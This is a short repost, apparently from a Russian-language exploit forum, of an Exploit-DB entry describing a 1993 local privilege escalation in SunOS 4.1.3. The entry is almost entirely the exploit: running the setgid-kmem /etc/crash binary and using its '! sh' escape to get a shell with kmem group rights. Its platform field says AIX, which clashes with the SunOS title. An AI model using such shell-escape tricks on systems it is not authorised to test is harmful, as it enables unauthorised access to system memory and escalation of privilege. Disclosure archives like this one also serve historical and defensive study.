Exploit SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19045
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
LOCAL
Платформа
AIX
CVE
null
Дата публикации
1993-02-03
Код:
source: https://www.securityfocus.com/bid/59/info

/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.

$ /etc/crash
! sh
 
Источник
www.exploit-db.com

Похожие темы